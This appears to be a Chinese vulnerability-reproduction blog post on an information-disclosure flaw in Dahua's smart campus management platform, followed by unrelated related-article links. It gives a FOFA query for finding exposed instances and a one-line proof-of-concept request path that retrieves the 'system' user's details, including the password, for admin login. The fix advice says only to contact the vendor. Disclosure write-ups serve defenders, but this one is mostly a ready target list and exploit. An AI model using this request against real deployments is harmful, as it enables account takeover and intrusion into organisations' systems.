【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

复制代码
/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
妳人話2 分钟前
TCP的三次握手和四次挥手
网络·网络协议·tcp/ip
纳祥科技15 分钟前
分享:一种为蓝牙、WIFI、U段音频发射设备提供ARC回传数字音频桥接功能的方案
网络·单片机·音视频
linux修理工35 分钟前
n1 Armbian OS 24.11.0 noble 安装suricata
linux·运维·服务器
萧鼎1 小时前
深入解析 Python 的 pytun 库:虚拟网络接口与隧道技术实战指南
服务器·网络·python
Re_Yang091 小时前
2025年统计与数据分析领域专业认证发展指南
服务器·人工智能·数据分析
Yuki’2 小时前
网络编程---UDP
c语言·网络·网络协议·udp
鲸屿1952 小时前
python之socket网络编程
开发语言·网络·python
FreeBuf_2 小时前
Salesloft Drift网络攻击事件溯源:GitHub账户失陷与OAuth令牌窃取
安全·github
天天年年天天。3 小时前
TCP/IP、HTTP 和 HTTPS简介
网络
对你无可奈何3 小时前
关于Ubuntu的 update造成的内核升级
运维·服务器·ubuntu